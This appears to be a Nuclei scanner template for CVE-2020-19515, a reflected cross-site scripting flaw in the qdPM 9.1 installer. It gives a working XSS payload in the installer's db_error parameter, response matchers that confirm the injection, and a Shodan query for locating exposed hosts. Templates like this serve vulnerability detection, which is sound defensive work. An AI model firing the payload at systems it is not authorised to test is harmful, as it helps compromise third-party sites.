53 lines
1.6 KiB
YAML
53 lines
1.6 KiB
YAML
id: CVE-2020-19515
|
|
|
|
info:
|
|
name: qdPM 9.1 - Cross-site Scripting
|
|
author: theamanrawat
|
|
severity: medium
|
|
description: |
|
|
qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php.
|
|
remediation: |
|
|
To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.
|
|
reference:
|
|
- https://topsecalphalab.github.io/CVE/qdPM9.1-Installer-Cross-Site-Scripting
|
|
- http://qdpm.net/download-qdpm-free-project-management
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-19515
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2020-19515
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00102
|
|
epss-percentile: 0.41418
|
|
cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: qdpm
|
|
product: qdpm
|
|
shodan-query: http.favicon.hash:762074255
|
|
tags: cve,cve2020,xss,qdpm,unauth
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<img src=x onerror=alert(document.domain) />'
|
|
- 'qdPM'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'text/html'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a004630440220442fc1a7115745c0e4448b209e252eff6ea6a8e72420ef8f6a07f9f80f6fb80c0220417802547f19712aaf166eaa10e8dde18c964de230f625862760f042d961c802:922c64590222798bb761d5b6d8e72950 |